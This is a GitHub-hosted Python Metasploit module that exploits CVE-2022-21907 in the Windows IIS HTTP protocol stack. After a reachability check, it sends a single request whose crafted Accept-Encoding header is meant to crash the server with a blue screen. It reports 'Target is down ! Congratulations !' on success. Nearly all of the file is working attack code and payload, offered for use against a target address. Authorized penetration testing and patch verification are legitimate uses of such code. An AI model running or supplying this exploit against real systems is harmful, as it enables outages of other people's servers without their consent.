-
Notifications
You must be signed in to change notification settings - Fork 11
/
py_dos_iis_2022_21907.py
123 lines (105 loc) · 3.83 KB
/
py_dos_iis_2022_21907.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
This module requires Metasploit: https://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
This module performs a DOS attack using a simple HTTP request.
"""
from urllib.error import URLError, HTTPError
from urllib.request import Request, urlopen
from ssl import _create_unverified_context
from logging import info, error
from os.path import basename
from socket import timeout
from typing import Dict
from metasploit import module
metadata = {
"name": "CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability - Windows IIS DOS BlueScreen",
"description": "This module can be used to perform a DOS attack on IIS server. This module exploit the CVE-2022-21907 and causes a Blue Screen with only one payload.",
"license": "MSF_LICENSE",
"authors": ["Maurice LAMBERT <[email protected]>"],
"date": "2022-01-11",
"references": [
{"type": "cve", "ref": "2022-21907"},
{
"type": "url",
"ref": "https://nvd.nist.gov/vuln/detail/CVE-2022-21907",
},
{
"type": "url",
"ref": "https://github.com/mauricelambert/CVE-2022-21907",
},
],
"type": "dos",
"options": {
"rhost": {
"type": "address",
"description": "Target address",
"required": True,
"default": None,
},
"rport": {
"type": "int",
"description": "Target port",
"required": True,
"default": 80,
},
"verbose": {
"type": "bool",
"description": "Verbose mode",
"required": False,
"default": None,
},
"ssl": {
"type": "bool",
"description": "Use SSL",
"required": False,
"default": False,
},
},
}
def run(args: Dict[str, str]) -> None:
"""
This module performs a DOS attack using a simple HTTP request.
"""
port = args["rport"]
host = args["rhost"]
ssl = False if not args["ssl"] or args["ssl"] == "false" else True
payload = {
"Accept-Encoding": "AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,"
}
module.LogHandler.setup(msg_prefix=f"{basename(__file__)}[{host}:{port}] - ")
info("Trying first connection...")
try:
urlopen(
f'http{"s" if ssl else ""}://{host}:{port}',
context=_create_unverified_context() if ssl else None,
)
except HTTPError:
pass
except Exception as e:
error(
f"The connection was refused by the remote host ({host}:{port})."
)
error(
f"Auxiliary aborted due to failure: unreachable: {host}:{port} - Could not connect to web service - no response"
)
return None
info("First connection OK. Sending payload...")
try:
urlopen(
Request(
f'http{"s" if ssl else ""}://{host}:{port}',
headers=payload,
),
context=_create_unverified_context() if ssl else None,
timeout=10,
)
except (timeout, TimeoutError, URLError):
info("Target is down ! Congratulations !")
return None
except Exception as e:
error(f"{e.__class__.__name__}: {e}")
error("Target is not vulnerable and up.")
if __name__ == "__main__":
module.run(metadata, run)